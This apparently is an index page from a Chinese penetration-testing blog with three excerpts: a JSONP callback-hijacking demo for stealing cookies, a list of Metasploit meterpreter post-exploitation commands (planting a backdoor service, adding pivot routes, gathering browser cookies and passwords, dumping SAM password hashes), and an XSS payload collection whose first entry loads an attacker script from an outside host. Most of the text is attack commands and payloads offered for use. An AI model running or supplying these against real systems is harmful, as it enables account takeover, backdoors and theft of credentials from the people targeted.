jsonp跨域劫持姿势

利用场景: 对于本域的某接口要回调外域的参数时,对回调的referer值无任何校验.方可利用. 例如: http://xxx.xxxx.xxxx/index?callback=http://xxx.xxx.xxx&xxx=1 有callback参数未做校验,那么,可以用来做个jsonp跨域劫持Cookie. Demo: <html> <script> function test(json){ alert(JSON.stringify(json)) } </script> <script src=”http://xxx.xxxx.xxxx/index?callback=test&xxx=1″></script> </html>

查看全部


msf 常用渗透模块—-POST

创建服务作为后门 meterpreter > run metsvc 查看目标主机的内网IP段情况 meterpreter > run get_local_subnets 添加路由表和对应的session route add 192.168.1.0 255.255.255.0 1 查看路由表 route print 读取目标主机IE浏览器cookies等缓存信息,嗅探目标主机登录过的各类账号密码 meterpreter > run post/windows/gather/enum_ie 获取目标主机上最近访问过的文档、链接信息 meterpreter > run post/windows/gather/dumplinks 在获得system权限的情况下,使用hashdump命令可以到处目标主机的SAM文件,获取目标主机的账号密码hash信息,剩下的可以用爆破软件算出明 […]

查看全部


XSS Playload 集合

更新时间:2017年03月16日 javascript:s=document.createElement(‘script’);s.src=’http://www.xxx.com/xss.js’;document.body.appendChild(s)   更新时间:2017年03月01日 <embed src=”data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPS […]

查看全部